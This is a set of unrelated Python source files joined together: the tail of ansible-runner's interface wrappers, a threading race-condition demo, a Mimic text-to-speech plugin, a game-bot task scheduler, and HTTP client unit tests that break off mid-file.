This is only used for 'jsonfile' type fact caches.
:param fact_cache_type: A string of the type of fact cache to use. Defaults to 'jsonfile'.
:param private_data_dir: The directory containing all runner metadata needed to invoke the runner
module. Output artifacts will also be stored here for later consumption.
:param ident: The run identifier for this invocation of Runner. Will be used to create and name
the artifact directory holding the results of the invocation.
:param event_handler: An optional callback that will be invoked any time an event is received by Runner itself, return True to keep the event
:param cancel_callback: An optional callback that can inform runner to cancel (returning True) or not (returning False)
:param finished_callback: An optional callback that will be invoked at shutdown after process cleanup.
:param status_handler: An optional callback that will be invoked any time the status changes (e.g. started, running, failed, successful, timeout)
:param artifacts_handler: An optional callback that will be invoked at the end of the run to deal with the artifacts from the run.
:type plugin_names: list
:type plugin_type: str
:type response_format: str
:type snippet: bool
:type playbook_dir: str
:type module_path: str
:type runner_mode: str
:type cwd: str
:type envvars: dict
:type passwords: dict
:type settings: dict
:type private_data_dir: str
:type project_dir: str
:type artifact_dir: str
:type fact_cache_type: str
:type fact_cache: str
:type process_isolation: bool
:type process_isolation_executable: str
:type container_image: str
:type container_volume_mounts: list
:type container_options: list
:type container_workdir: str
:type ident: str
:type rotate_artifacts: int
:type ssh_key: str
:type quiet: bool
:type json_mode: bool
:type event_handler: function
:type cancel_callback: function
:type finished_callback: function
:type status_handler: function
:type artifacts_handler: function
:returns: Returns a tuple of response and error string. If ``runner_mode`` is set to ``pexpect``, the error value is empty as
``pexpect`` uses the same output descriptor for stdout and stderr. If the value of ``response_format`` is ``json``,
the response is returned as a python dictionary object.
'''
r = init_plugin_docs_config(plugin_names, plugin_type=plugin_type, response_format=response_format,
snippet=snippet, playbook_dir=playbook_dir, module_path=module_path, **kwargs)
r.run()
response = r.stdout.read()
error = r.stderr.read()
if response and response_format == 'json':
response = json.loads(santize_json_response(response))
return response, error
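# Example usage (a minimal sketch):
#
#   docs, err = ansible_runner.get_plugin_docs(plugin_names=['file', 'copy'],
#                                              plugin_type='module',
#                                              response_format='json')
#   # with response_format='json', docs is a python dictionary keyed by plugin name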
def get_plugin_docs_async(plugin_names, plugin_type=None, response_format=None, snippet=False, playbook_dir=None, module_path=None, **kwargs):
'''
Run an ansible-doc command in the background which will start immediately. Returns the thread object and a Runner object.
This uses the same parameters as :py:func:`ansible_runner.interface.get_plugin_docs`
:returns: A tuple containing a :py:class:`threading.Thread` object and a :py:class:`ansible_runner.runner.Runner` object
'''
r = init_plugin_docs_config(plugin_names, plugin_type=plugin_type, response_format=response_format,
snippet=snippet, playbook_dir=playbook_dir, module_path=module_path, **kwargs)
doc_runner_thread = threading.Thread(target=r.run)
doc_runner_thread.start()
return doc_runner_thread, r
def get_plugin_list(list_files=None, response_format=None, plugin_type=None, playbook_dir=None, module_path=None, **kwargs):
'''
Run an ansible-doc command to get the list of installed Ansible plugins.
:param list_files: When set to ``True``, the file path of each plugin is returned along with the plugin name.
:param response_format: The output format for the response. Valid values are ``json`` or ``human``, and the response
is either a json string or plain text in human readable format. Default value is ``json``.
:param plugin_type: The type of the plugins to list. Valid values are ``become``, ``cache``, ``callback``,
``cliconf``, ``connection``, ``httpapi``, ``inventory``, ``lookup``, ``netconf``, ``shell``, ``vars``,
``module``, ``strategy``. If the value is not provided it defaults to ``module``.
:param playbook_dir: Sets the relative path to handle playbook-adjacent installed plugins.
:param module_path: Prepends the given colon-separated path(s) to the module library
(default: ~/.ansible/plugins/modules:/usr/share/ansible/plugins/modules).
:param runner_mode: The applicable values are ``pexpect`` and ``subprocess``. Default is set to ``subprocess``.
:param cwd: The current working directory from which the command in executable_cmd should be executed.
:param envvars: Environment variables to be used when running Ansible. Environment variables will also be
read from ``env/envvars`` in ``private_data_dir``
:param passwords: A dictionary containing password prompt patterns and response values used when processing output from
Ansible. Passwords will also be read from ``env/passwords`` in ``private_data_dir``.
:param settings: A dictionary containing settings values for the ``ansible-runner`` runtime environment. These will also
be read from ``env/settings`` in ``private_data_dir``.
:param ssh_key: The ssh private key passed to ``ssh-agent`` as part of the ansible-playbook run.
:param quiet: Disable all output
:param json_mode: Store event data in place of stdout on the console and in the stdout file
:param artifact_dir: The path to the directory where artifacts should live, this defaults to 'artifacts' under the private data dir
:param project_dir: The path to the playbook content, this defaults to 'project' within the private data dir
:param rotate_artifacts: Keep at most n artifact directories, disable with a value of 0 which is the default
:param process_isolation: Enable process isolation, using a container engine (e.g. podman).
:param process_isolation_executable: Process isolation executable or container engine used to isolate execution. (default: podman)
:param container_image: Container image to use when running an ansible task (default: quay.io/ansible/ansible-runner:devel)
:param container_volume_mounts: List of bind mounts in the form 'host_dir:/container_dir:labels'. (default: None)
:param container_options: List of container options to pass to execution engine.
:param container_workdir: The working directory within the container.
:param fact_cache: A string that will be used as the name for the subdirectory of the fact cache in artifacts directory.
This is only used for 'jsonfile' type fact caches.
:param fact_cache_type: A string of the type of fact cache to use. Defaults to 'jsonfile'.
:param private_data_dir: The directory containing all runner metadata needed to invoke the runner
module. Output artifacts will also be stored here for later consumption.
:param ident: The run identifier for this invocation of Runner. Will be used to create and name
the artifact directory holding the results of the invocation.
:param event_handler: An optional callback that will be invoked any time an event is received by Runner itself, return True to keep the event
:param cancel_callback: An optional callback that can inform runner to cancel (returning True) or not (returning False)
:param finished_callback: An optional callback that will be invoked at shutdown after process cleanup.
:param status_handler: An optional callback that will be invoked any time the status changes (e.g. started, running, failed, successful, timeout)
:param artifacts_handler: An optional callback that will be invoked at the end of the run to deal with the artifacts from the run.
:type list_files: bool
:type plugin_type: str
:type response_format: str
:type playbook_dir: str
:type module_path: str
:type runner_mode: str
:type cwd: str
:type envvars: dict
:type passwords: dict
:type settings: dict
:type private_data_dir: str
:type project_dir: str
:type artifact_dir: str
:type fact_cache_type: str
:type fact_cache: str
:type process_isolation: bool
:type process_isolation_executable: str
:type container_image: str
:type container_volume_mounts: list
:type container_options: list
:type container_workdir: str
:type ident: str
:type rotate_artifacts: int
:type ssh_key: str
:type quiet: bool
:type json_mode: bool
:type event_handler: function
:type cancel_callback: function
:type finished_callback: function
:type status_handler: function
:type artifacts_handler: function
:returns: Returns a tuple of response and error string. If ``runner_mode`` is set to ``pexpect``, the error value is empty as
``pexpect`` uses the same output descriptor for stdout and stderr. If the value of ``response_format`` is ``json``,
the response is returned as a python dictionary object.
'''
event_callback_handler = kwargs.pop('event_handler', None)
status_callback_handler = kwargs.pop('status_handler', None)
artifacts_handler = kwargs.pop('artifacts_handler', None)
cancel_callback = kwargs.pop('cancel_callback', None)
finished_callback = kwargs.pop('finished_callback', None)
rd = DocConfig(**kwargs)
rd.prepare_plugin_list_command(list_files=list_files, response_format=response_format, plugin_type=plugin_type,
playbook_dir=playbook_dir, module_path=module_path)
r = Runner(rd,
event_handler=event_callback_handler,
status_handler=status_callback_handler,
artifacts_handler=artifacts_handler,
cancel_callback=cancel_callback,
finished_callback=finished_callback)
r.run()
response = r.stdout.read()
error = r.stderr.read()
if response and response_format == 'json':
response = json.loads(santize_json_response(response))
return response, error
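# Example usage (a minimal sketch):
#
#   plugins, err = ansible_runner.get_plugin_list(list_files=True,
#                                                 response_format='json')
#   # with response_format='json', plugins is the parsed ansible-doc listing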
def get_inventory(action, inventories, response_format=None, host=None, playbook_dir=None, vault_ids=None, vault_password_file=None, **kwargs):
'''
Run an ansible-inventory command to get inventory related details.
:param action: Valid values are one of ``graph``, ``host``, ``list``.
``graph`` creates an inventory graph, ``host`` returns specific host info and works as an inventory script, and
``list`` outputs all hosts info and also works as an inventory script.
:param inventories: List of inventory host paths.
:param response_format: The output format for the response. Valid values are one of ``json``, ``yaml``, ``toml``.
Default is ``json``. If ``action`` is ``graph``, the only allowed value is ``json``.
:param host: When ``action`` is set to ``host``, this parameter is used to get the host-specific information.
:param playbook_dir: Sets the relative path for the inventory.
:param vault_ids: The vault identity to use.
:param vault_password_file: The vault password file to use.
:param runner_mode: The applicable values are ``pexpect`` and ``subprocess``. Default is set to ``subprocess``.
:param cwd: The current working directory from which the command in executable_cmd should be executed.
:param envvars: Environment variables to be used when running Ansible. Environment variables will also be
read from ``env/envvars`` in ``private_data_dir``
:param passwords: A dictionary containing password prompt patterns and response values used when processing output from
Ansible. Passwords will also be read from ``env/passwords`` in ``private_data_dir``.
:param settings: A dictionary containing settings values for the ``ansible-runner`` runtime environment. These will also
be read from ``env/settings`` in ``private_data_dir``.
:param ssh_key: The ssh private key passed to ``ssh-agent`` as part of the ansible-playbook run.
:param quiet: Disable all output
:param json_mode: Store event data in place of stdout on the console and in the stdout file
:param artifact_dir: The path to the directory where artifacts should live, this defaults to 'artifacts' under the private data dir
:param project_dir: The path to the playbook content, this defaults to 'project' within the private data dir
:param rotate_artifacts: Keep at most n artifact directories, disable with a value of 0 which is the default
:param process_isolation: Enable process isolation, using a container engine (e.g. podman).
:param process_isolation_executable: Process isolation executable or container engine used to isolate execution. (default: podman)
:param container_image: Container image to use when running an ansible task (default: quay.io/ansible/ansible-runner:devel)
:param container_volume_mounts: List of bind mounts in the form 'host_dir:/container_dir:labels'. (default: None)
:param container_options: List of container options to pass to execution engine.
:param container_workdir: The working directory within the container.
:param fact_cache: A string that will be used as the name for the subdirectory of the fact cache in artifacts directory.
This is only used for 'jsonfile' type fact caches.
:param fact_cache_type: A string of the type of fact cache to use. Defaults to 'jsonfile'.
:param private_data_dir: The directory containing all runner metadata needed to invoke the runner
module. Output artifacts will also be stored here for later consumption.
:param ident: The run identifier for this invocation of Runner. Will be used to create and name
the artifact directory holding the results of the invocation.
:param event_handler: An optional callback that will be invoked any time an event is received by Runner itself, return True to keep the event
:param cancel_callback: An optional callback that can inform runner to cancel (returning True) or not (returning False)
:param finished_callback: An optional callback that will be invoked at shutdown after process cleanup.
:param status_handler: An optional callback that will be invoked any time the status changes (e.g. started, running, failed, successful, timeout)
:param artifacts_handler: An optional callback that will be invoked at the end of the run to deal with the artifacts from the run.
:type action: str
:type inventories: list
:type response_format: str
:type host: str
:type playbook_dir: str
:type vault_ids: str
:type vault_password_file: str
:type runner_mode: str
:type cwd: str
:type envvars: dict
:type passwords: dict
:type settings: dict
:type private_data_dir: str
:type project_dir: str
:type artifact_dir: str
:type fact_cache_type: str
:type fact_cache: str
:type process_isolation: bool
:type process_isolation_executable: str
:type container_image: str
:type container_volume_mounts: list
:type container_options: list
:type container_workdir: str
:type ident: str
:type rotate_artifacts: int
:type ssh_key: str
:type quiet: bool
:type json_mode: bool
:type event_handler: function
:type cancel_callback: function
:type finished_callback: function
:type status_handler: function
:type artifacts_handler: function
:returns: Returns a tuple of response and error string. If ``runner_mode`` is set to ``pexpect``, the error value is
empty as ``pexpect`` uses the same output descriptor for stdout and stderr. If the value of ``response_format`` is ``json``,
the response is returned as a python dictionary object.
'''
event_callback_handler = kwargs.pop('event_handler', None)
status_callback_handler = kwargs.pop('status_handler', None)
artifacts_handler = kwargs.pop('artifacts_handler', None)
cancel_callback = kwargs.pop('cancel_callback', None)
finished_callback = kwargs.pop('finished_callback', None)
rd = InventoryConfig(**kwargs)
rd.prepare_inventory_command(action=action, inventories=inventories, response_format=response_format, host=host, playbook_dir=playbook_dir,
vault_ids=vault_ids, vault_password_file=vault_password_file)
r = Runner(rd,
event_handler=event_callback_handler,
status_handler=status_callback_handler,
artifacts_handler=artifacts_handler,
cancel_callback=cancel_callback,
finished_callback=finished_callback)
r.run()
response = r.stdout.read()
error = r.stderr.read()
if response and response_format == 'json':
response = json.loads(santize_json_response(response))
return response, error
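# Example usage (a minimal sketch; the inventory path is hypothetical):
#
#   inv, err = ansible_runner.get_inventory(action='list',
#                                           inventories=['/tmp/demo/inventory/hosts'],
#                                           response_format='json')
#   # with response_format='json', inv is the parsed 'ansible-inventory --list' output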
def get_ansible_config(action, config_file=None, only_changed=None, **kwargs):
'''
Run an ansible-config command to get ansible configuration related details.
:param action: Valid values are one of ``list``, ``dump``, ``view``.
``list`` returns all config options, ``dump`` returns the active configuration and
``view`` returns the contents of the configuration file.
:param config_file: Path to the configuration file; defaults to the first file found in precedence.
:param only_changed: When set to ``True``, only the configurations that have changed
from the default are returned. This parameter is applicable only when ``action`` is set to ``dump``.
:param runner_mode: The applicable values are ``pexpect`` and ``subprocess``. Default is set to ``subprocess``.
:param cwd: The current working directory from which the command in executable_cmd should be executed.
:param envvars: Environment variables to be used when running Ansible. Environment variables will also be
read from ``env/envvars`` in ``private_data_dir``
:param passwords: A dictionary containing password prompt patterns and response values used when processing output from Ansible.
Passwords will also be read from ``env/passwords`` in ``private_data_dir``.
:param settings: A dictionary containing settings values for the ``ansible-runner`` runtime environment. These will also
be read from ``env/settings`` in ``private_data_dir``.
:param ssh_key: The ssh private key passed to ``ssh-agent`` as part of the ansible-playbook run.
:param quiet: Disable all output
:param json_mode: Store event data in place of stdout on the console and in the stdout file
:param artifact_dir: The path to the directory where artifacts should live, this defaults to 'artifacts' under the private data dir
:param project_dir: The path to the playbook content, this defaults to 'project' within the private data dir
:param rotate_artifacts: Keep at most n artifact directories, disable with a value of 0 which is the default
:param process_isolation: Enable process isolation, using a container engine (e.g. podman).
:param process_isolation_executable: Process isolation executable or container engine used to isolate execution. (default: podman)
:param container_image: Container image to use when running an ansible task (default: quay.io/ansible/ansible-runner:devel)
:param container_volume_mounts: List of bind mounts in the form 'host_dir:/container_dir:labels'. (default: None)
:param container_options: List of container options to pass to execution engine.
:param container_workdir: The working directory within the container.
:param fact_cache: A string that will be used as the name for the subdirectory of the fact cache in artifacts directory.
This is only used for 'jsonfile' type fact caches.
:param fact_cache_type: A string of the type of fact cache to use. Defaults to 'jsonfile'.
:param private_data_dir: The directory containing all runner metadata needed to invoke the runner
module. Output artifacts will also be stored here for later consumption.
:param ident: The run identifier for this invocation of Runner. Will be used to create and name
the artifact directory holding the results of the invocation.
:param event_handler: An optional callback that will be invoked any time an event is received by Runner itself, return True to keep the event
:param cancel_callback: An optional callback that can inform runner to cancel (returning True) or not (returning False)
:param finished_callback: An optional callback that will be invoked at shutdown after process cleanup.
:param status_handler: An optional callback that will be invoked any time the status changes (e.g. started, running, failed, successful, timeout)
:param artifacts_handler: An optional callback that will be invoked at the end of the run to deal with the artifacts from the run.
:type action: str
:type config_file: str
:type only_changed: bool
:type runner_mode: str
:type cwd: str
:type envvars: dict
:type passwords: dict
:type settings: dict
:type private_data_dir: str
:type project_dir: str
:type artifact_dir: str
:type fact_cache_type: str
:type fact_cache: str
:type process_isolation: bool
:type process_isolation_executable: str
:type container_image: str
:type container_volume_mounts: list
:type container_options: list
:type container_workdir: str
:type ident: str
:type rotate_artifacts: int
:type ssh_key: str
:type quiet: bool
:type json_mode: bool
:type event_handler: function
:type cancel_callback: function
:type finished_callback: function
:type status_handler: function
:type artifacts_handler: function
:returns: Returns a tuple of response and error string. If ``runner_mode`` is set to ``pexpect``, the error value is
empty as ``pexpect`` uses the same output descriptor for stdout and stderr.
'''
event_callback_handler = kwargs.pop('event_handler', None)
status_callback_handler = kwargs.pop('status_handler', None)
artifacts_handler = kwargs.pop('artifacts_handler', None)
cancel_callback = kwargs.pop('cancel_callback', None)
finished_callback = kwargs.pop('finished_callback', None)
rd = AnsibleCfgConfig(**kwargs)
rd.prepare_ansible_config_command(action=action, config_file=config_file, only_changed=only_changed)
r = Runner(rd,
event_handler=event_callback_handler,
status_handler=status_callback_handler,
artifacts_handler=artifacts_handler,
cancel_callback=cancel_callback,
finished_callback=finished_callback)
r.run()
response = r.stdout.read()
error = r.stderr.read()
return response, error
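# Example usage (a minimal sketch):
#
#   cfg, err = ansible_runner.get_ansible_config(action='dump', only_changed=True)
#   print(cfg)                     # plain-text dump of settings changed from the default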
|
lock_no.py
|
# -*- coding: utf-8 -*-
import time, threading
balance = 0
def change_it(n):
global balance
balance = balance + n
balance = balance - n
def run_thread(n):
for i in range(100000):
change_it(n)
t1 = threading.Thread(target=run_thread, args=(5, ))
t2 = threading.Thread(target=run_thread, args=(8, ))
t1.start()
t2.start()
t1.join()
t2.join()
print(balance)  # frequently non-zero: the unlocked updates from t1 and t2 race
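# A minimal sketch of the thread-safe variant (added for illustration): guarding
# the read-modify-write in change_it() with a threading.Lock makes each update
# atomic, so the final balance printed below is always 0.
lock = threading.Lock()

def change_it_locked(n):
    global balance
    with lock:
        balance = balance + n
        balance = balance - n

def run_thread_locked(n):
    for i in range(100000):
        change_it_locked(n)

balance = 0
t3 = threading.Thread(target=run_thread_locked, args=(5, ))
t4 = threading.Thread(target=run_thread_locked, args=(8, ))
t3.start()
t4.start()
t3.join()
t4.join()
print(balance)  # always 0 once the lock serializes the updates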
|
mimic_tts.py
|
# # NEON AI (TM) SOFTWARE, Software Development Kit & Application Development System
# # All trademark and other rights reserved by their respective owners
# # Copyright 2008-2021 Neongecko.com Inc.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# 3. Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from this
# software without specific prior written permission.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA,
# OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import os
import stat
import subprocess
from threading import Thread
from time import time, sleep
import os.path
from os.path import exists, join, expanduser
from mycroft import MYCROFT_ROOT_PATH
from mycroft.api import DeviceApi
from neon_core.configuration import Configuration
from mycroft.util.download import download
from mycroft.util.log import LOG
from neon_core.tts import TTS, TTSValidator
config = Configuration.get().get("tts").get("mimic")
data_dir = expanduser(Configuration.get()['data_dir'])
BIN = config.get("path",
os.path.join(MYCROFT_ROOT_PATH, 'mimic', 'bin', 'mimic'))
if not os.path.isfile(BIN):
# Search for mimic on the path
import distutils.spawn
BIN = distutils.spawn.find_executable("mimic")
SUBSCRIBER_VOICES = {'trinity': join(data_dir, 'voices/mimic_tn')}
def download_subscriber_voices(selected_voice):
"""
Function to download all premium voices, starting with
the currently selected if applicable
"""
def make_executable(dest):
""" Call back function to make the downloaded file executable. """
LOG.info('Make executable')
# make executable
st = os.stat(dest)
os.chmod(dest, st.st_mode | stat.S_IEXEC)
# First download the selected voice if needed
voice_file = SUBSCRIBER_VOICES.get(selected_voice)
if voice_file is not None and not exists(voice_file):
LOG.info('voice doesn\'t exist, downloading')
url = DeviceApi().get_subscriber_voice_url(selected_voice)
# Check we got an url
if url:
dl = download(url, voice_file, make_executable)
# Wait for completion
while not dl.done:
sleep(1)
else:
LOG.debug('{} is not available for this architecture'
.format(selected_voice))
# Download the rest of the subscriber voices as needed
for voice in SUBSCRIBER_VOICES:
voice_file = SUBSCRIBER_VOICES[voice]
if not exists(voice_file):
url = DeviceApi().get_subscriber_voice_url(voice)
# Check we got an url
if url:
dl = download(url, voice_file, make_executable)
# Wait for completion
while not dl.done:
sleep(1)
else:
LOG.debug('{} is not available for this architecture'
.format(voice))
class Mimic(TTS):
def __init__(self, lang, config):
super(Mimic, self).__init__(
lang, config, MimicValidator(self), 'wav',
ssml_tags=["speak", "ssml", "phoneme", "voice", "audio", "prosody"]
)
self.dl = None
self.clear_cache()
# Download subscriber voices if needed
self.is_subscriber = DeviceApi().is_subscriber
if self.is_subscriber:
t = Thread(target=download_subscriber_voices, args=[self.voice])
t.daemon = True
t.start()
def modify_tag(self, tag):
for key, value in [
('x-slow', '0.4'),
('slow', '0.7'),
('medium', '1.0'),
('high', '1.3'),
('x-high', '1.6'),
('speed', 'rate')
]:
tag = tag.replace(key, value)
return tag
@property
def args(self):
""" Build mimic arguments. """
if (self.voice in SUBSCRIBER_VOICES and
exists(SUBSCRIBER_VOICES[self.voice]) and self.is_subscriber):
# Use subscriber voice
mimic_bin = SUBSCRIBER_VOICES[self.voice]
voice = self.voice
elif self.voice in SUBSCRIBER_VOICES:
# Premium voice but bin doesn't exist, use ap while downloading
mimic_bin = BIN
voice = 'ap'
else:
# Normal case use normal binary and selected voice
mimic_bin = BIN
voice = self.voice
args = [mimic_bin, '-voice', voice, '-psdur', '-ssml']
stretch = config.get('duration_stretch', None)
if stretch:
args += ['--setf', 'duration_stretch=' + stretch]
return args
def get_tts(self, sentence, wav_file):
# Generate WAV and phonemes
phonemes = subprocess.check_output(self.args + ['-o', wav_file,
'-t', sentence])
return wav_file, phonemes.decode()
def viseme(self, output):
visemes = []
start = time()
pairs = str(output).split(" ")
for pair in pairs:
pho_dur = pair.split(":") # phoneme:duration
if len(pho_dur) == 2:
visemes.append((VISIMES.get(pho_dur[0], '4'),
float(pho_dur[1])))
return visemes
class MimicValidator(TTSValidator):
def __init__(self, tts):
super(MimicValidator, self).__init__(tts)
def validate_lang(self):
# TODO: Verify version of mimic can handle the requested language
pass
def validate_connection(self):
try:
subprocess.call([BIN, '--version'])
except Exception:
LOG.info("Failed to find mimic at: " + BIN)
raise Exception(
'Mimic was not found. Run install-mimic.sh to install it.')
def get_tts_class(self):
return Mimic
# Mapping based on Jeffers phoneme to viseme map, seen in table 1 from:
# http://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.221.6377&rep=rep1&type=pdf
#
# Mycroft unit visemes based on images found at:
# http://www.web3.lu/wp-content/uploads/2014/09/visemes.jpg
#
# Mapping was created partially based on the "12 mouth shapes visuals seen at:
# https://wolfpaulus.com/journal/software/lipsynchronization/
VISIMES = {
# /A group
'v': '5',
'f': '5',
# /B group
'uh': '2',
'w': '2',
'uw': '2',
'er': '2',
'r': '2',
'ow': '2',
# /C group
'b': '4',
'p': '4',
'm': '4',
# /D group
'aw': '1',
# /E group
'th': '3',
'dh': '3',
# /F group
'zh': '3',
'ch': '3',
'sh': '3',
'jh': '3',
# /G group
'oy': '6',
'ao': '6',
# /Hgroup
'z': '3',
's': '3',
# /I group
'ae': '0',
'eh': '0',
'ey': '0',
'ah': '0',
'ih': '0',
'y': '0',
'iy': '0',
'aa': '0',
'ay': '0',
'ax': '0',
'hh': '0',
# /J group
'n': '3',
't': '3',
'd': '3',
'l': '3',
# /K group
'g': '3',
'ng': '3',
'k': '3',
# blank mouth
'pau': '4',
}
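# Example (illustrative): mimic's "-psdur" output is a stream of "phoneme:duration"
# pairs such as "pau:0.2 hh:0.05 ax:0.04 l:0.06 ow:0.15", which viseme() above maps
# to [('4', 0.2), ('0', 0.05), ('0', 0.04), ('3', 0.06), ('2', 0.15)] using this table.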
|
app.py
|
import threading
import time
import schedule
from lokbot.farmer import LokFarmer, TASK_CODE_SILVER_HAMMER, TASK_CODE_GOLD_HAMMER
def find_alliance(farmer: LokFarmer):
while True:
alliance = farmer.api.alliance_recommend().get('alliance')
if alliance.get('numMembers') < alliance.get('maxMembers'):
farmer.api.alliance_join(alliance.get('_id'))
break
time.sleep(60 * 5)
def main(token, captcha_solver_config=None):
if captcha_solver_config is None:
captcha_solver_config = {}
farmer = LokFarmer(token, captcha_solver_config)
threading.Thread(target=farmer.sock_thread).start()
schedule.every(120).to(240).minutes.do(farmer.alliance_helper)
schedule.every(60).to(120).minutes.do(farmer.harvester)
schedule.every(200).to(300).minutes.do(farmer.vip_chest_claim)
schedule.every(120).to(240).minutes.do(farmer.use_resource_in_item_list)
schedule.every(120).to(240).minutes.do(farmer.alliance_farmer)
schedule.run_all()
threading.Thread(target=farmer.free_chest_farmer_thread).start()
threading.Thread(target=farmer.quest_monitor_thread).start()
threading.Thread(target=farmer.building_farmer_thread, args=(TASK_CODE_SILVER_HAMMER,)).start()
threading.Thread(target=farmer.building_farmer_thread, args=(TASK_CODE_GOLD_HAMMER,)).start()
threading.Thread(target=farmer.academy_farmer_thread).start()
while True:
schedule.run_pending()
time.sleep(1)
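# Example usage (a minimal sketch; the token value is a placeholder and the real
# entry point may differ):
#
#   if __name__ == '__main__':
#       main(token='<lok-auth-token>')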
|
freetests.py
|
#!/usr/bin/env python3
# coding: utf-8
# Copyright 2013 Abram Hindle
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# run python freetests.py
import unittest
import httpclient
import http.server
import threading
import socketserver
import random
import time
import urllib.parse
import json
BASEHOST = '127.0.0.1'
BASEPORT = 27600 + random.randint(1,100)
httpclass = httpclient
#import mysolution
#httpclass = mysolution
# Sorry but in Python this comes out of the box!
class MyHTTPHandler(http.server.BaseHTTPRequestHandler):
post = None
get = None
def do_POST(self):
try:
if (self.post == None):
return None
else:
return self.post()
except Exception as e:
print("Exception %s\n" % e)
raise e
def do_GET(self):
try:
print("GET %s\n" % self.path)
if (self.get == None):
return None
else:
return self.get()
except Exception as e:
print("Exception %s\n" % e)
raise e
def make_http_server(host = BASEHOST, port = BASEPORT):
return http.server.HTTPServer( (host, port) , MyHTTPHandler)
# always returns 404
def nothing_available(self):
self.send_error(404, "File not found")
self.end_headers()
self.wfile.write(bytes("","utf-8"))
# repeats your path back
def echo_path_get(self):
self.send_response(200)
self.send_header("Content-type", "text/plain")
self.end_headers()
self.wfile.write(bytes("%s\n" % self.path,"utf-8"))
# repeats your post back as json
def echo_post(self):
length = int(self.headers['Content-Length'])
post_data = urllib.parse.parse_qs(self.rfile.read(length).decode('utf-8'))
self.send_response(200)
self.send_header("Content-type", "application/json")
self.end_headers()
self.wfile.write(bytes(json.dumps(post_data),"utf-8"))
def header_check(self):
response = 200
errors = []
if 'Host' not in self.headers:
response = 400
errors.append("No Host header found")
self.send_response(response)
self.send_header("Content-type", "application/json")
self.end_headers()
self.wfile.write(bytes(json.dumps(errors),"utf-8"))
def die_on_method(self):
response = 405
errors = []
errors.append("Method Not Allowed")
if 'Host' not in self.headers:
errors.append("No Host header found")
self.send_response(response)
self.send_header("Content-type", "application/json")
self.end_headers()
self.wfile.write(bytes(json.dumps(errors),"utf-8"))
def post_header_check(self):
response = 200
errors = []
if 'Host' not in self.headers:
response = 400
errors.append("No Host header found")
if 'Content-length' not in self.headers:
response = 400
errors.append("No Content-Length header found")
self.send_response(response)
self.send_header("Content-type", "application/json")
self.end_headers()
self.wfile.write(bytes(json.dumps(errors),"utf-8"))
class TestHTTPClient(unittest.TestCase):
httpd = None
running = False
@classmethod
def setUpClass(self):
'''Cache the httpd server and run it as a thread'''
if (TestHTTPClient.httpd == None):
try:
self.thread = threading.Thread(target=self.run_server).start()
time.sleep(1)
except Exception as e:
print(e)
print("setUP: Thread died")
raise(e)
@classmethod
def run_server(self):
'''run the httpd server in a thread'''
try:
socketserver.TCPServer.allow_reuse_address = True
http.server.HTTPServer.allow_reuse_address = True
TestHTTPClient.httpd = make_http_server()
print("HTTP UP!\n")
TestHTTPClient.httpd.serve_forever()
print("HTTP has been shutdown!\n")
except Exception as e:
print(e)
print("run_server: Thread died")
def test404GET(self):
'''Test against 404 errors'''
MyHTTPHandler.get = nothing_available
http = httpclass.HTTPClient()
req = http.GET("http://%s:%d/49872398432" % (BASEHOST,BASEPORT) )
self.assertTrue(req != None, "None Returned!")
self.assertTrue(req.code == 404)
def test404POST(self):
'''Test against 404 errors'''
MyHTTPHandler.post = nothing_available
http = httpclass.HTTPClient()
req = http.POST("http://%s:%d/49872398432" % (BASEHOST,BASEPORT) )
self.assertTrue(req != None, "None Returned!")
self.assertTrue(req.code == 404)
def testGET(self):
'''Test HTTP GET'''
MyHTTPHandler.get = echo_path_get
http = httpclass.HTTPClient()
path = "abcdef/gjkd/dsadas"
url = "http://%s:%d/%s" % (BASEHOST,BASEPORT, path)
req = http.GET( url )
self.assertTrue(req != None, "None Returned!")
self.assertTrue(req.code == 200)
self.assertTrue(req.body.find(path)>=0, "Data: [%s] " % req.body)
def testGETHeaders(self):
'''Test HTTP GET Headers'''
MyHTTPHandler.get = header_check
MyHTTPHandler.post = die_on_method
http = httpclass.HTTPClient()
path = "abcdef/gjkd/dsadas"
url = "http://%s:%d/%s" % (BASEHOST,BASEPORT, path)
req = http.GET( url )
self.assertTrue(req != None, "None Returned!")
self.assertTrue(req.code == 200)
def testPOSTHeaders(self):
'''Test HTTP POST Headers'''
MyHTTPHandler.post = post_header_check
MyHTTPHandler.get = die_on_method
http = httpclass.HTTPClient()
path = "abcdef/gjkd/dsadas"
url = "http://%s:%d/%s" % (BASEHOST,BASEPORT, path)
req = http.POST( url )
self.assertTrue(req != None, "None Returned!")
self.assertTrue(req.code == 200,"Code is %s but I wanted a 200 OK" % req.code)
# consider disabling this test until everything else works
def testInternetGets(self):
'''Test HTTP Get in the wild, these webservers are far less
forgiving'''
MyHTTPHandler.get = echo_path_get
http = httpclass.HTTPClient()
urls = [
"http://www.cs.ualberta.ca/",
"http://softwareprocess.es/static/SoftwareProcess.es.html",
